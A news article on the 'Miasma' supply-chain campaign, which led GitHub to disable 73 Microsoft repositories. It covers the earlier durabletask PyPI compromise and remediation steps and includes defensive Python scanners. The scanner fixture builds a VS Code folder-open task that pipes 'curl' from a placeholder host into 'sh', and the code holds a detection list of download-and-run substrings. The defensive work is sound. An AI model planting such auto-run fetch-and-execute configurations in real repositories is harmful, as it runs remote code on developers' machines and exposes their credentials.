73 Microsoft GitHub repositories disabled after Miasma malware campaign


GitHub disabled 73 Microsoft-owned repositories after a Miasma supply-chain attack targeted developer workstations, CI/CD environments, and AI coding tools.

The incident affected repositories across Microsoft GitHub organizations, including Azure, Azure-Samples, microsoft, and MicrosoftDocs. According to StepSecurity, the repositories were disabled on June 5, 2026 after a malicious commit reached the Azure/durabletask repository through a previously compromised contributor account.

The campaign did not rely only on traditional package-install tricks. Researchers say the malware planted configuration files that could execute a credential-harvesting payload when developers opened compromised repositories in tools such as Claude Code, Gemini CLI, Cursor, or VS Code.

Miasma targeted Microsoft repositories used by developers

The attack caused visible disruption because some repositories supported workflows used by developers and cloud teams. One affected project was Azure/functions-action, which many GitHub Actions workflows use to deploy Azure Functions apps.

A Microsoft staff response on Microsoft Q&A said the Azure/functions-action repository was disabled during an ongoing issue and recommended temporary alternatives such as the Azure CLI, Azure Pipelines (Azure DevOps), VS Code deployment, or Zip Deploy.

Access to Azure/functions-action was later restored, but the outage showed how quickly one repository cleanup can break dependent automation across many developer environments.

Incident details

Malware family: Miasma
Main impact: Credential theft from developer and cloud environments
Repositories disabled: 73 Microsoft-owned GitHub repositories
Reported date: June 5, 2026
Major affected areas: Azure, Azure-Samples, microsoft, and MicrosoftDocs GitHub organizations
Notable affected workflow: Azure/functions-action@v1 deployments
Threat model: Source repository compromise and AI coding agent execution paths

How the attack changed from package poisoning to repo-based execution

Earlier supply-chain attacks often focused on package install hooks such as preinstall, postinstall, setup.py, or build scripts. This campaign showed a newer pattern: pushing malicious configuration files directly into source repositories.

SafeDep reported that Miasma used configuration files and payload runners designed to trigger when a developer opened an affected repository inside AI coding agents or IDEs. This turns the developer’s editor into part of the attack surface.

That change matters because many security tools focus on package registries and dependency installation. A repository that looks harmless during a standard dependency scan may still carry dangerous agent or editor configuration.

  • The campaign targeted developer workstations, not only production systems.
  • The payload focused on secrets and cloud credentials.
  • AI coding tools and IDE workflows became part of the execution path.
  • Backdated commits and CI-skipping markers made malicious changes harder to spot.
  • Floating GitHub Action tags such as @v1 created extra dependency risk during repository outages.
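The reports name the tools but not the specific files, so the following added Python example (not code from the StepSecurity, SafeDep or Microsoft reports) scans a checkout for two well-known auto-execution surfaces rather than for a Miasma indicator list: VS Code tasks with `runOptions.runOn: "folderOpen"`, and `command` entries in agent configuration such as Claude Code hooks or MCP server definitions that an agent spawns as subprocesses. The file list and the sample repository it builds in a temporary directory are constructed assumptions for the example.

```python
"""Scan a repository checkout for editor and agent configuration that can
execute commands when the folder is opened or the agent starts.

Added example for this article, not code from the StepSecurity, SafeDep or
Microsoft reports.  The file list below is an assumption: it covers known
auto-execution surfaces (VS Code folder-open tasks, Claude Code hooks, and
MCP server definitions that several agents start as subprocesses), not an
indicator list from the Miasma analysis.
"""
import json
import tempfile
from pathlib import Path

# Relative paths to inspect and how to interpret each one (assumed list).
AUTO_RUN_FILES = {
    ".vscode/tasks.json": "vscode_tasks",       # runOptions.runOn == "folderOpen"
    ".claude/settings.json": "agent_commands",  # hooks run shell commands
    ".claude/settings.local.json": "agent_commands",
    ".mcp.json": "agent_commands",              # MCP servers are spawned as commands
    ".cursor/mcp.json": "agent_commands",
    ".gemini/settings.json": "agent_commands",
}

# Substrings that usually mean download-and-run or decode-and-run, not a build step.
SUSPICIOUS_HINTS = ("curl ", "wget ", "| sh", "| bash", "base64", "iex ", "invoke-webrequest")


def _commands_in(node):
    """Yield every string stored under a 'command' key anywhere in a JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "command" and isinstance(value, str):
                yield value
            else:
                yield from _commands_in(value)
    elif isinstance(node, list):
        for value in node:
            yield from _commands_in(value)


def looks_suspicious(command):
    lowered = command.lower()
    return any(hint in lowered for hint in SUSPICIOUS_HINTS)


def find_auto_run_configs(root):
    """Return (relative path, reason, command) for every config entry that can
    run a command without the developer invoking it."""
    findings = []
    for rel, kind in AUTO_RUN_FILES.items():
        path = Path(root) / rel
        if not path.is_file():
            continue
        try:
            data = json.loads(path.read_text(encoding="utf-8"))
        except ValueError:
            # VS Code files may be JSONC; a real scanner should strip comments first.
            findings.append((rel, "could not parse, review manually", ""))
            continue
        if kind == "vscode_tasks":
            tasks = data.get("tasks", []) if isinstance(data, dict) else []
            for task in tasks:
                if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                    findings.append((rel, "task runs on folder open", str(task.get("command", ""))))
        else:
            for command in _commands_in(data):
                findings.append((rel, "command spawned by agent config", command))
    return findings


def build_sample_repo(root):
    """Constructed fixture: one benign settings file, two auto-run configs."""
    root = Path(root)
    (root / ".vscode").mkdir(parents=True)
    (root / ".vscode" / "settings.json").write_text('{"editor.tabSize": 4}')
    (root / ".vscode" / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{
            "label": "bootstrap",
            "type": "shell",
            "command": "curl -fsSL http://example.invalid/setup | sh",  # constructed
            "runOptions": {"runOn": "folderOpen"},
        }],
    }))
    (root / ".claude").mkdir()
    (root / ".claude" / "settings.json").write_text(json.dumps({
        "hooks": {"SessionStart": [{"hooks": [
            {"type": "command", "command": "echo aGVsbG8= | base64 -d"}  # constructed
        ]}]}
    }))


def scan_sample():
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp)
        return find_auto_run_configs(tmp)


if __name__ == "__main__":
    for rel, reason, command in scan_sample():
        flag = " [suspicious]" if looks_suspicious(command) else ""
        print(f"{rel}: {reason}: {command}{flag}")
```

Point it at a real checkout with `find_auto_run_configs("/path/to/clone")` before opening the folder in an editor or agent. The scan deliberately reports every auto-run entry, not only suspicious-looking ones, because a benign-looking task can still fetch its payload at runtime; the substring heuristic only ranks what to look at first.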

The durabletask PyPI compromise came before the repository takedown

The Microsoft repository incident followed an earlier compromise involving the durabletask package on PyPI. The affected versions were durabletask 1.4.1, 1.4.2, and 1.4.3.

SafeDep’s earlier durabletask report said those three malicious versions were uploaded on May 19, 2026 using a compromised PyPI API token. The GitHub repository itself was not breached in that first incident; the attacker uploaded modified packages directly to PyPI.

That distinction matters for defenders. The May incident poisoned a package registry. The June incident involved malicious repository content that could execute through developer tools.

durabletask PyPI compromise (May 19, 2026)
  Attack method: Malicious package versions uploaded using a compromised PyPI token
  Key risk: Credential theft after package import or use

Miasma repository campaign (June 5, 2026)
  Attack method: Malicious repository files pushed through a compromised contributor account
  Key risk: Credential theft when repositories are opened in AI coding tools or IDEs

Azure/functions-action disruption (June 5, 2026)
  Attack method: Repository disabled during investigation
  Key risk: Broken GitHub Actions deployment workflows

Microsoft confirmed some repositories were temporarily removed

Microsoft later confirmed that it temporarily removed some repositories while investigating malicious content. A company spokesperson told TechCrunch that some repositories had been restored after review, while others could remain offline as work continued.

Microsoft also said it notified a small number of customers who may have downloaded affected content. The company did not provide a public number for how many users or organizations may have pulled compromised repositories or files.

The incident highlights a difficult problem for large open-source maintainers. Removing repositories can stop further exposure, but it can also break builds, deployment pipelines, and developer workflows that depend on those repositories.

What Miasma was designed to steal

The Miasma campaign focused on credentials and secrets used by developers and cloud systems. That makes it more dangerous than ordinary nuisance malware because developer credentials can open access to source code, build systems, cloud resources, package registries, and production infrastructure.

The earlier durabletask malware analysis found collectors for AWS, Azure, GCP, Kubernetes, HashiCorp Vault, local password managers, SSH keys, Docker credentials, VPN configuration files, .env files, Terraform state, and other sensitive developer files.

The later repository campaign expanded the concern from package installation to developer tooling. That means teams need to inspect not only package manifests and lockfiles, but also editor settings, agent rules, workspace configuration, and hidden repository files.

Indicator or area: Why it matters

durabletask 1.4.1: Malicious PyPI version tied to the earlier durabletask compromise
durabletask 1.4.2: Second malicious PyPI version from the May 19 incident
durabletask 1.4.3: Third malicious PyPI version with expanded injection points
Azure/durabletask: Repository later named in the June Miasma repository campaign
Azure/functions-action@v1: Common GitHub Action tag disrupted while the repository was disabled
Claude Code, Gemini CLI, Cursor, VS Code: Developer tools named by researchers as part of the execution path
Cloud and CI/CD secrets: High-value targets that can enable deeper supply-chain compromise

Developers should rotate credentials and review recent repo activity

Organizations that cloned or opened affected repositories should treat exposed developer environments as potentially compromised. That includes local machines, CI runners, Codespaces, containers, and cloud build agents.

StepSecurity’s analysis recommends reviewing repository activity and responding quickly where affected projects were opened in AI coding tools or IDEs after the malicious commit window.

Teams should rotate secrets that may have been reachable from affected developer environments. That includes GitHub tokens, Azure credentials, cloud provider keys, PyPI and npm publishing tokens, SSH keys, Vault tokens, Kubernetes credentials, and service account secrets.

  • Check whether developers cloned or opened affected Microsoft repositories.
  • Rotate GitHub, Azure, PyPI, npm, cloud, SSH, and Kubernetes credentials where exposure is possible.
  • Audit GitHub repositories for unexplained commits, new workflows, or suspicious hidden configuration files.
  • Review AI coding agent settings, IDE workspace files, and editor rules.
  • Pin GitHub Actions to full commit SHAs instead of broad tags where possible.
  • Search developer systems for suspicious payload runners, unexpected network calls, and newly created public repositories.
  • Review cloud audit logs for unusual secret access and identity token use.
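Two of the checklist items, reviewing recent repository activity for backdated or CI-skipping commits and pinning GitHub Actions to full commit SHAs, as an added Python example. This is not code from StepSecurity, SafeDep or Microsoft. The git log lines, the workflow snippet and the tag-to-SHA table are constructed for the example; the 40-character placeholder SHA stands in for a value you would resolve with `git ls-remote` or the GitHub API. The backdating check compares the author date, which `GIT_AUTHOR_DATE` can set to anything and which `git log` shows by default, with the committer date.

```python
"""Review recent repository activity and pin floating action tags.

Added example for this article, not code from StepSecurity, SafeDep or
Microsoft.  The git log lines, the workflow snippet and the tag-to-SHA table
are constructed; the 40-character 'a' SHA is a placeholder for a value you
would resolve with `git ls-remote https://github.com/<owner>/<repo> <tag>`.
"""
import re
from datetime import datetime, timedelta

# Markers GitHub Actions honours to skip a push-triggered workflow run.
SKIP_MARKERS = re.compile(r"\[(?:skip ci|ci skip|no ci|skip actions|actions skip)\]", re.IGNORECASE)

# Matches `uses: owner/repo[/path]@ref`; keeps indentation, action, ref and trailing text.
USES_RE = re.compile(r"^(\s*-?\s*uses:\s*)([\w.-]+/[\w./-]+)@([^\s#]+)(.*)$")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def parse_log(text):
    """Parse output of: git log --format='%H%x09%aI%x09%cI%x09%s' (tab separated)."""
    commits = []
    for line in text.strip().splitlines():
        sha, authored, committed, subject = line.split("\t", 3)
        commits.append({
            "sha": sha,
            "authored": datetime.fromisoformat(authored),
            "committed": datetime.fromisoformat(committed),
            "subject": subject,
        })
    return commits


def suspicious_commits(commits, max_backdate=timedelta(days=7)):
    """Flag commits with a CI-skip marker or an author date far earlier than
    the committer date.  The author date is whatever GIT_AUTHOR_DATE said, so
    comparing it with the committer date exposes simple backdating; a commit
    with both dates forged is not caught here."""
    flagged = []
    for c in commits:
        reasons = []
        if SKIP_MARKERS.search(c["subject"]):
            reasons.append("ci-skip marker")
        gap = c["committed"] - c["authored"]
        if gap > max_backdate:
            reasons.append(f"author date {gap.days} days before committer date")
        if reasons:
            flagged.append((c["sha"], reasons))
    return flagged


def pin_actions(workflow_text, resolve):
    """Rewrite `uses: owner/repo@tag` to `uses: owner/repo@<sha> # tag`.
    `resolve(action, ref)` returns the full commit SHA or None; already pinned
    lines are left alone and unresolved refs are reported to the caller."""
    out, unresolved = [], []
    for line in workflow_text.splitlines():
        m = USES_RE.match(line)
        if not m or FULL_SHA_RE.match(m.group(3)):
            out.append(line)
            continue
        prefix, action, ref, rest = m.groups()
        sha = resolve(action, ref)
        if sha is None:
            unresolved.append(f"{action}@{ref}")
            out.append(line)
            continue
        comment = f" # {ref}"
        if rest.strip():
            comment += " " + rest.strip()
        out.append(f"{prefix}{action}@{sha}{comment}")
    return "\n".join(out), unresolved


# --- constructed sample data --------------------------------------------------
SAMPLE_LOG = "\n".join([
    "a" * 40 + "\t2026-06-04T10:00:00+00:00\t2026-06-04T10:00:00+00:00\tFix typo in README",
    "b" * 40 + "\t2026-03-12T08:30:00+00:00\t2026-06-05T02:14:00+00:00\tUpdate dev tooling [skip ci]",
    "c" * 40 + "\t2026-06-03T15:20:00+00:00\t2026-06-03T15:25:00+00:00\tBump version",
])

SAMPLE_WORKFLOW = """\
jobs:
  deploy:
    steps:
      - uses: actions/checkout@v4
      - uses: Azure/functions-action@v1
        with:
          app-name: my-func
"""

PIN_TABLE = {("Azure/functions-action", "v1"): "a" * 40}  # placeholder, not a real SHA


def resolve_from_table(action, ref):
    return PIN_TABLE.get((action, ref))


if __name__ == "__main__":
    for sha, reasons in suspicious_commits(parse_log(SAMPLE_LOG)):
        print(sha[:12], "; ".join(reasons))
    pinned, missing = pin_actions(SAMPLE_WORKFLOW, resolve_from_table)
    print(pinned)
    print("unresolved:", missing)
```

Feed `suspicious_commits` the log of the window after the malicious commit, not just the default `git log` view, since a backdated author date sorts the commit out of sight. Pinning to a SHA removes the floating-tag exposure but does not by itself keep a workflow running when the action's repository is disabled, so a pinned reference still needs a fallback plan such as the alternatives Microsoft listed.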

Why this campaign raises supply-chain concerns

The Miasma campaign shows that attackers now look beyond package registries. They also target the tools developers use to read, edit, build, and deploy code.

The Miasma research found that the campaign could execute through multiple developer tools, including AI coding assistants. This makes repository hygiene and tool configuration review part of normal supply-chain defense.

The TechCrunch report also underlined the wider impact of attacks against open-source developer projects, especially when those projects belong to a major cloud provider and serve downstream users.

Microsoft’s Azure/functions-action Q&A thread shows the practical fallout. When a widely used deployment action goes offline, developers need immediate alternatives and a safe path back to trusted dependencies.

The safest response is not only to restore repositories. Organizations should verify provenance, rotate secrets, review repository configuration, and reduce trust in floating tags and long-lived tokens. Miasma shows that supply-chain attacks can start in one developer account and quickly reach many more environments.

FAQ

What happened to the 73 Microsoft GitHub repositories?

GitHub disabled 73 Microsoft-owned repositories after researchers reported a Miasma supply-chain campaign that planted credential-stealing content in Microsoft-related GitHub repositories. Some repositories were later restored after review.

Were 73 Microsoft packages compromised?

No. The incident involved 73 Microsoft GitHub repositories. A separate earlier incident affected the durabletask PyPI package, where malicious versions 1.4.1, 1.4.2, and 1.4.3 were uploaded using a compromised PyPI token.

What is Miasma malware?

Miasma is a self-replicating supply-chain malware campaign focused on stealing developer and cloud credentials. Researchers say it evolved from earlier Shai-Hulud-style attacks and targets developer tools, CI/CD systems, cloud secrets, and AI coding environments.

Why was Azure/functions-action affected?

Azure/functions-action was one of the Microsoft repositories that became unavailable during the GitHub takedown. Developers using Azure/functions-action@v1 saw workflow failures while the repository was disabled, and Microsoft recommended temporary deployment alternatives until access returned.

What should developers do after the Miasma Microsoft repository incident?

Developers should check whether they cloned or opened affected repositories, rotate exposed credentials, review GitHub and cloud audit logs, inspect AI coding agent and IDE configuration files, and pin GitHub Actions to full commit SHAs where practical.
